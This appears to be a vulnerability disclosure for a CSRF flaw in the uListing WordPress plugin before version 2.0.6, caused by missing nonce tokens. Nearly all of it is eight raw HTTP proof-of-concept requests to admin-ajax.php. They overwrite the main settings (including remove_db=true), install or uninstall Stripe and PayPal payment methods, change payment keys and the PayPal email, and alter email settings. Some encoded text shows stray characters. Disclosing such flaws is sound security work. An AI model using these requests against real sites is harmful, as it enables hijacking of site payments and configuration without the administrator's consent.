uListing < 2.0.6 - Settings Update via CSRF

A Settings Update via CSRF vulnerability was discovered in the plugin. Missing WPNonce security tokens [ https://codex.wordpress.org/WordPress_Nonces ].

PoC

PoC #1 | CSRF | Main Settings Update: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 6784 action=stm_settings_save&data;%5Bcron%5D%5Bmode%5D=alternate&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Benable%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bverify%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Btitle%5D=Google&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Btitle%5D=Google+Client+ID&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Btitle%5D=Google+Client+Secret&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bwrap%5D=google-icon-wrapper&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bicon%5D=icon-search+path1&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2Fwp-login.php%3Fsocial_method%3Dgoogle&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+target%3D%22_blank%22+href%3D%22https%3A%2F%2Fdevelopers.google.com%2Fidentity%2Fsign-in%2Fweb%2Fsign-in%22%3EGoogle+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Benable%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bverify%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Btitle%5D=Facebook&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Btitle%5D=Facebook+App+ID&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Btitle%5D=Facebook+App+Secret&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bicon%5D=fab+fa-facebook-f&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2F%3Fsocial_method%3DFacebook&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Ffacebook-login%2F%22%3EFacebook+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Benable%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bverify%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Btitle%5D=Twitter&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Btitle%5D=Twitter+API+Key&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Btitle%5D=Twitter+API+Secret&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bwrap%5D=twitter-icon-wrapper&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bicon%5D=fab+fa-twitter&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data;%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Flog-in-with-twitter%2Flogin-in-with-twitter%22%3ETwitter+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Benable%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bverify%5D=false&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Btitle%5D=Vkontakte&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Btitle%5D=Vkontakte+API+ID&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Btitle%5D=Vkontakte+Secret+Key&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Bvalue%5D=&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bicon%5D=fab+fa-vk&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data;%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fvk.com%2Fdev%22%3EVkontakte+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data;%5BsocialLogin%5D%5Bpreferences%5D%5Btab%5D=yes&data;%5BsocialLogin%5D%5Bpreferences%5D%5Bicons%5D=square&data;%5BsocialLogin%5D%5Bpreferences%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data;%5BsocialLogin%5D%5Bpreferences%5D%5Btitle%5D=Login+with+social+ID&data;%5Bpages%5D%5Baccount_page%5D%5Baccount%5D=9&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-profile%5D=edit-profile&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-plans%5D=my-plans&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bpayment-history%5D=payment-history&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-listing%5D=my-listing&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bsaved-searches%5D=saved-searches&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-card%5D=my-card&data;%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-account%5D=&data;%5Bpages%5D%5Badd_listing%5D%5Blisting%5D=12&data;%5Bpages%5D%5Bpricing_plan%5D%5Bpricing%5D=13&data;%5Bpages%5D%5Blisting_type_page%5D%5B15%5D=16&data;%5Bpages%5D%5Blisting_type_page%5D%5B17%5D=18&data;%5Bpages%5D%5Blisting_type_page%5D%5B55%5D=2&data;%5Bpages%5D%5Blisting_type_page%5D%5B62%5D=0&data;%5Bpages%5D%5Bwishlist%5D%5Bwishlist_page%5D=&data;%5Bpages%5D%5Bcompare%5D%5Bcompare_page%5D=&data;%5Bmain%5D%5Bcurrency%5D%5Bcurrency%5D=USD&data;%5Bmain%5D%5Bcurrency%5D%5Bposition%5D=left_space&data;%5Bmain%5D%5Bcurrency%5D%5Bcharacters_after%5D=2&data;%5Bmain%5D%5Bcurrency%5D%5Bdecimal_separator%5D=.&data;%5Bmain%5D%5Bcurrency%5D%5Bthousands_separator%5D=%2C&data;%5Bmain%5D%5Bmap%5D%5Bapi_key%5D=&data;%5Bmain%5D%5Bmap%5D%5Bmap_type%5D=google&data;%5Bmain%5D%5Bmap%5D%5Bhover_option%5D=no&data;%5Bmain%5D%5Bpricing_plans%5D%5Bback_slots%5D=true&data;%5Bmain%5D%5Bpricing_plans%5D%5Bdelete_listings%5D=true&data;%5Bmain%5D%5Bshort_codes%5D%5Bcategories%5D=8&data;%5Bmain%5D%5Bshort_codes%5D%5Bfeatured_listings%5D=8&data;%5Bmain%5D%5Bextra%5D%5Bremove_db%5D=true&data;%5Bmain%5D%5Bdefault_placeholder%5D= PoC #2 | CSRF | Stripe Payment Install: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 60 action=stm_payment_method&type;=install&payment;_method=stripe PoC #3 | CSRF | Stripe Payment Settings Update: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 260 action=stm_save_payment&id;=stripe&data;%5Bpublishable_key%5D=PoC&data;%5Bsecret_key%5D=1553&data;%5Bwhsec%5D=1553 PoC #4 | CSRF | PayPal Payment Install: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 69 action=stm_payment_method&type;=install&payment;_method=paypal_standard PoC #5 | CSRF | PayPal Payment Settings Update: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 94 action=stm_save_payment&id;=paypal_standard&data;%5Bemail%5D=poc%40email.tld&data;%5Bmode%5D=live PoC #6 | CSRF | PayPal Payment Uninstall: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 71 action=stm_payment_method&type;=uninstall&payment;_method=paypal_standard PoC #7 | CSRF | Stripe Payment Uninstall: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 62 action=stm_payment_method&type;=uninstall&payment;_method=stripe PoC #8 | CSRF | Email Settings Update: POST /wp-admin/admin-ajax.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 439 action=stm_update_email_data&data;%5Bbanner%5D=&data;%5Blogo%5D=&data;%5Bsocials%5D%5Binstagram%5D%5Blabel%5D=Instagram&data;%5Bsocials%5D%5Binstagram%5D%5Blink%5D=&data;%5Bsocials%5D%5Bfacebook%5D%5Blabel%5D=Facebook&data;%5Bsocials%5D%5Bfacebook%5D%5Blink%5D=&data;%5Bsocials%5D%5Byoutube%5D%5Blabel%5D=Youtube&data;%5Bsocials%5D%5Byoutube%5D%5Blink%5D=&data;%5Bsocials%5D%5Btwitter%5D%5Blabel%5D=Twitter&data;%5Bsocials%5D%5Btwitter%5D%5Blink%5D=